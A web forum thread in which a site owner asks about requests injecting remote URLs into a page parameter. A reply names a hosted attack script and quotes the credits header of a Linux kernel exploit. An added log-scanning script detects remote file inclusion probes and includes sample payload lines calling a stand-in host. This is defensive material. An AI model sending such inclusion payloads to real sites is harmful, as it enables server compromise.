Attempting to hack my site

  • b8edbreth
  • Born
  • Posts: 2

Post 3+ Months Ago

I have been seeing something odd lately. My website uses MySQL to store its HTML, and the index page displays it based on the variable passed in each link. Example: http://www.mysite.com/?page=home
I have seen a number of people attempting to exploit this by requesting URLs like: http://mysite.com/?page=http://www.cige ... .0/cmd.gif?
Which, because of the way my site works, does nothing but bring up a blank page. I am wondering what exactly they are trying to exploit. Does anyone have info on this?

April.

  • lucassix
  • Mastermind
  • Posts: 2350
  • Loc: Indiana

Post 3+ Months Ago

If you go and look at http://www.ciget.com.ve/.0/cmd.gif it is really a script which the attacker is passing variables to.

Quote:
" * Linux kernel do_brk vma overflow exploit.\n" .
" *\n" .
" * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
" *\n" .
" * Further research and exploit development by\n" .
" * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
" *\n" .
" * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
" *\n" .
" * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
" * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .


http://isec.pl/papers/linux_kernel_do_brk.pdf
  • b8edbreth
  • Born
  • Posts: 2

Post 3+ Months Ago

Well, it's a good thing that the way my script works, it doesn't load anything from or into that variable but uses it to find a piece of data. The data cannot be found because the page value is invalid and thus the screen goes blank.
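
Added example, not part of the thread: requests that put an absolute URL into a content-selecting parameter such as `page` are typical remote file inclusion probes, and they can be picked out of the web server's access log even when they only produce a blank page. The sketch below assumes Apache combined log format and watches only the `page` parameter named in the first post; the log lines, addresses and the `remote.example` host are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote

# Constructed sample lines in Apache combined log format (not from the thread).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Apr/2006:10:01:02 +0000] "GET /?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Apr/2006:10:01:09 +0000] "GET /?page=http://remote.example/.0/cmd.gif? HTTP/1.1" 200 0 "-" "libwww-perl/5.805"
198.51.100.23 - - [12/Apr/2006:10:01:11 +0000] "GET /?page=http%3A%2F%2Fremote.example%2Fcmd.gif%3F HTTP/1.1" 200 0 "-" "libwww-perl/5.805"
203.0.113.9 - - [12/Apr/2006:10:02:30 +0000] "GET /?page=links&ref=http://www.example.org/ HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Apr/2006:10:03:00 +0000] "GET /?page=%2568ttp%253A%252F%252Fremote.example%252Fx.txt%253F HTTP/1.1" 200 0 "-" "curl/7.15"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)  # value starts with scheme://
WATCHED_PARAMS = {"page"}  # assumption: the only parameter that selects content

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded URLs are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_inclusion_probes(log_text):
    """Return {client_ip: [(status, decoded_value), ...]} for suspicious requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, target, status = m.groups()
        query = target.partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(value)  # parse_qsl has already decoded once
            if name in WATCHED_PARAMS and SCHEME_RE.match(value):
                hits[client].append((status, value))
    return dict(hits)

if __name__ == "__main__":
    for client, probes in find_inclusion_probes(SAMPLE_LOG).items():
        print(client, len(probes), probes)
```

The `ref=` URL in the fourth sample line is deliberately not flagged, since only the watched parameter is checked.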

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.